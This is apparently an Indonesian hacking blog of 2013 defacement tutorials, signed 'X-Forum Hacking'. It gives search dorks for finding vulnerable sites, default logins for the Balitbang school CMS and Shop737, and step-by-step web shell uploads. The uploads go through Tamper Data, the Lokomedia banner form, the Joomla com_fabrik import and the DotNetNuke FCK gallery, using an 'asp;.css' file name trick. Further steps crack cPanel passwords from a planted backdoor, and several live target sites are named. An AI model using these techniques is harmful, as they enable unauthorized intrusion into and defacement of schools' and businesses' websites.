Sabtu, 08 Juni 2013

Deface Domain sch.id Teknik Bugbalitbang

Oke sob, seperti biasa, langsung saja kita simak bersama (^_^).
Dork in google..
1. inurl:"/html/index.php" intext:"Tim Balitbang"
2. inurl:"/html/index.php" intitle:"Selamat Datang"
3. inurl:"/member/" intext:"Tim Balitbang" 

D in bing..
1. IP:[target-IP] /html/
2. IP:[target-IP] sch.id
3. IP:[target-IP] ac.id
4. IP:[target-IP] blablablaa� having fun! :D
Dalam teknik ini, kita menggukan default pass member CMS Balitbang.

USERNAMEPASSWORDDETAILSSHELL UPLOAD
alan123456guruavailable
kickdody123456guruavailable
siswanto123456guruavailable
choirulyogya123456guruavailable
wardjana123456guruavailable
taufik123456guruavailable
tomi123456guruavailable
alumni123456siswanot available
070810120123456siswanot available

  
  
  
  
  








Setelah kita ketahui data - data default login member CMS Balitbang diatas, langkah selanjutnya adalah.
Sign in member form,,,
http://localhost/member/










Nah, seperti ini sob (^_^)












Login dan upload shell, lewat SIM -> Data Laporan, kemudian tambahkan laporan, nah dari sini kita upload shell kita, otomatis shell yg terupload akan berada pada path http://localhost/laporan/











Lalu terserah mau kita apakan, asal jangan merusak yaa sob (^_^)
Jangan Lupa Nitip Nama : X-Forum Hacking 
Semoga bermanfaat, dan ini sebuah peringatan kecil untuk siapa saja para penggunaCMS-Balitbang!

Cara Deface Dengan Temper Data

BAHAN :

1. Browser Mozilla
2. Add on tamper Data
3. shell(saya menggunakan hn-shell)
4. Rokok sampurna(Malrboro Putih juga boleh)
5. Koneksi internet (Pastinya)

Tutor
1. Saya asumsikan anda sudah berhasil masuk ke halaman admin dan sekarang carilah tempat dimana anda bisa upload file seperti gambar di bawah ini

d sini saya mencari tempat upload gambar





2. Kita tinggalkan dulu sebentar browser dan kita lihat shell yang udah d siapkan tadi dan ganti ekstensi nya menjadi .jpeg/.jpg


3. sekarang kita balik lagi ke halaman admin terus klik browse dan pilih shell yang udah d rubah ekstensi tadi trus klik open

4. sekarang buka Add-On Tamper Data Tool>>tamper data dan klik start tamper dan klik Update

5. Setelah itu akan muncul pilihan dan pilih tamper


6. lalu akan muncul seperti gambar di bawah ini dan Copy script yang saya lingkari dan copy ke notepad terus cari nama shell yang agan upload tadi lalu hapus ekstensi .jpeg/.jpeg lalu Copas ke Tempat yang tadi Lalu Klik Ok dan Pilih Abort Request


7. Setelah semuanya selesai cari shell yang sudah anda upload tadi di websitenya lalu Copy link address ny dan buka di tab baru....

8. Selamat anda Sudah berhasil Tanam shell a.k.a Backdoor a.k.a PintuBelakang a.k.a lawang dapo

Senin, 03 Juni 2013

Deface POC shop737 Jenis Site Co.id



Cara Deface Teknik shop737 Jenis Site Co.id xD
Maaf nya kalo site nya Co.id
ok deh langsung aja ke TKP

Kalo Kurang Ngerti Lihat Video >  LIHAT


Exploit :

DORK:
intext:"Powered by Shop737" site:co.id

Upload :
http://www.site.co.id/poto/upload.php

Login :
user : admin
Password : admin

tempat Deface:
http://www.site.co.id/poto/file/nama file anda

Jumat, 31 Mei 2013

Deface Web Lokomedia

Cara ini sebenarnya adalah cara lama. Mungkin sudah banyak web yang tahu cara ini dan segera mempatch webnya, namun saya yakin pasti ada beberapa yang belum update.

Baiklah berikut caranya :

1. Kita disini menggunakan dork, copy dork berikut ke kotak pencarian google allinurl:media.php?module=berita

2. Di hasil penelusuran terdapat beberapa web, utamanya web indo. Anda buka salah satunya.

3. Setelah anda buka, coba anda masuk ke halaman login adminnya. Anda bisa menemukannya dengan menambahkan /admin/ ataupun /administrator/
Contoh : http://www.site.com/admin/ atau http://www.site.com/administrator/
Namun tidak semua web halaman loginnya begitu

Berikut contoh halaman login sebuah web




4. Jika anda menemukan halaman loginnya, anda tambahkan ini ke belakang url'nya /content.php?module=banner
Contoh : http://www.site.com/admin/content.php?module=banner

5. Jika berhasil, anda klik "tambah banner"

6. Isi kolom tersebut dengan benar. Kolom link bisa anda dikosongi, kolom nama silahkan isi terserah, kolom terakhir isi dengan shell anda

7. Kita check shell kita work atau tidak dengan cara buka http://www.site.com/admin/foto_berita/shell.php

8. Jika berhasil terbuka berarti shell anda sukses tertanam pada web tersebut, anda bisa pindahkan web shell itu pada folder web yang lebih aman agar shell dapat bertahan lama.

9. Untuk eksekusi, anda bisa rubah file index.php nya dengan script deface anda.

Cpanel Crack With Python

Download dulu toolsnya disini : DISINI
Selain itu, kamu juga harus install Phyton 2.7.3
Untuk Python download disini : DISINI

Oke gue anggap kalian udah punya shell backdoor yang sudah tertanam di web target

1. Upload cp.php dan killer.php
2. Buka killer.php sehingga muncul penampakan seperti berikut





 3. klik Use to extract usernames
4. Muncul tuh user yang 1 server


Klik untuk memperbesar
5. Setelah diklik, tunggu sebentar, dan klik configuration files
6. Akan muncul penampakan seperti ini
7. Abaikan, ekstrak tools yang udah didownload tadi ke C:\ dan buka cmd ketik perintah ini 
- cd \
- cp.py [url INDISHELL tadi] [lokasi penyimpan config]
contoh:
cp.py http://www.site.com/INDISHELL C:\New Folder
8. Akan keluar list passwordnya, copy semua list passwordnya (klik kanan -> mark -> blok list passwordnya -> tekan [ENTER] untuk meng-copy)
9. buka cp.php (yang sudah ditanam di website target)
10. Pastekan password listnya ke kolom Pass
11. Klik Start Tunggu Selesai :)

Untuk Login cpanel site.com:2082 lau masukan username dan password hasil crack tadi kawan :).
Semoga Bermanfaat Kawan ?

Jangan Lupa titip Nama X-Forum Hacking

Rabu, 17 April 2013

Deface Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability

Live Target:
 http://sercaca.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1&Itemid=0

1. Gunakan Dork untuk mencari Target di Google 

inurl:index.php?option=com_fabrik



 2. Selanjutnya Pilih target sobat, disini ane udah nemu target... langsung aja di eksploitasi :D



3. Masukin exploitnya berikut;
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka akan muncul halaman upload seperti gambar berikut:


Note: Kalo tidak muncul halaman seperti gambar atau error, silahkan cari target yg lain! :p

4. upload shell sobat, klik Browse dan pilih shell sobat lalu klik Import CSV



5. Setelah itu lihat hasil upload shell sobat di http://site.com/media/shell.php




 Note: Kalo ga berhasil atau error, cari target lain aja :D

7. Goodluck! :p

Video Tutorial >>> LIHAT

Deface menggunakan ASPX

DORK :
inurl:Fck/fcklinkgallery.aspx
atau
/portals/0/
inurl:tabid/176/Default.aspx

pilih salah satu dork nya

klo udah ketemu target nya tambahkan ini "providers/htmleditorproviders/fck/fcklinkgallery.aspx

di sini ane menggunakan dork inurl:Fck/fcklinkgallery.aspx dan target http://www.pivocom.com/ sebagai contohnya..

sehingga akan menjadi seperti ini :
http://www.pivocom.com/Providers/Htm...nkgallery.aspx

setelah nge klik itu, tnggu loading selesai baru kamu harus klik
(File A file on your site)
dan ganti alamat protocol website nya jadi :
javascript:__doPostBack('ctlURL$cmdUpload','' )

ntar keluar sendiri tuh, tombol browse ny kya gini..


klo udah upload file yang pgn kamu masukin,,
file yang bisa di upload antara lain:

*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
klo gk punya shell nya download aja di sini http://www.media*fire..com/?72blav74ddvdtea
tapi gk smua web yang bisa upload file .html,
ada bbrapa situs yg hanya bisa upload file .txt

sebelum upload ubah ekstensi nya menjadi css
misal : hacker.asp;.css ingat ! kita harus menambahkan titik nya dua kali [contohnamashell(.)asp(.)css] sehingga berakhiran ".asp;.css" misal : "hacker.asp;.css"

upload, trus ktia buka hasil deface nya . .
kita liat dlu tadi nama file yang kita upload apa
misal : "hacker.asp;.css" kita buka alamat protocol nya
caranya : ' kan tadi alamat nya "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" [ dengan catatan setelah kita berhasil/ selesai upload ]

nah..abis itu agan ganti alamat "http://www.pivocom.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx" menjadi alamat halaman defaced kita menjadi http://www.pivocom.com/portals/0/agarirs.asp;.css intinya kita harus menambahkan "portals/0/" pada akhir http://www.pivocom.com/